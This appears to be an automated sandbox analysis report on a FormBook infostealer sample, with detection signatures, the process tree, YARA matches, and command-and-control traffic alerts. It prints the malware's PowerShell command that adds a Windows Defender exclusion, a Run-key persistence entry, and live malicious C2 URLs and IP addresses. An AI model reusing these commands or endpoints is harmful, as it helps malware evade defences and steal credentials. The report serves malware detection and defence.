Windows Analysis Report
z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe

Overview

General Information

Sample name: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
Analysis ID: 1509644
MD5: ee557be5d5e16d9ea01241f09a19a87b
SHA1: e83e01dca3b3684e4f417b85bb4172dc635377e8
SHA256: e42b2065cd7683b0be8702853b309e09474f23ff67851cb8295686194006622a
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" MD5: EE557BE5D5E16D9EA01241F09A19A87B)
    • powershell.exe (PID: 7564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • wab.exe (PID: 7608 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe (PID: 6936 cmdline: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SecEdit.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\SecEdit.exe" MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe (PID: 4832 cmdline: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • wab.exe (PID: 7624 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
    • WerFault.exe (PID: 7728 cmdline: C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wab.exe (PID: 7248 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6692 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 2504 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a9a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a9a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        4.2.wab.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.wab.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17232:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.wab.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.wab.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ce83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16432:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe", ParentImage: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ParentProcessId: 7448, ParentProcessName: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, ProcessId: 7564, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , CommandLine: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, NewProcessName: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, OriginalFileName: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7608, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe" , ProcessId: 6936, ProcessName: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Windows Mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SecEdit.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\26RXLR-
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe", ParentImage: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ParentProcessId: 7448, ParentProcessName: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force, ProcessId: 7564, ProcessName: powershell.exe


            AV Detection

            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeAvira: detected
            Source: http://www.aceautocorp.com/9og3/Avira URL Cloud: Label: malware
            Source: http://www.purpleheartlacey.com/rlev/Avira URL Cloud: Label: malware
            Source: http://www.purpleheartlacey.com/rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8Avira URL Cloud: Label: malware
            Source: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOKAvira URL Cloud: Label: malware
            Source: http://www.goodgiftguru.com/p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8Avira URL Cloud: Label: malware
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeReversingLabs: Detection: 36%
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeJoe Sandbox ML: detected

            Exploits

            Source: Yara matchFile source: 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe PID: 7448, type: MEMORYSTR
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb` source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdb source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdbH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdbGCTL source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdb source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdbGCTL source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1467468971.00000000006CE000.00000002.00000001.01000000.00000008.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3790653322.00000000006CE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb8 source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.pdbpH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058BC80 FindFirstFileW,FindNextFileW,FindClose,12_2_0058BC80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then pop edi4_2_00418543
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then xor eax, eax12_2_00579870
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then pop edi12_2_00585260
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then mov ebx, 00000004h12_2_02DF053F

            Networking

            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49726 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49741 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49712 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49724 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49720 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49739 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49734 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49747 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49749 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49751 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49748 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49752 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49716 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49755 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49738 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49744 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49728 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49730 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49732 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49740 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49754 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49743 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49750 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49707 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49746 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49756 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49742 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49736 -> 91.195.240.19:80
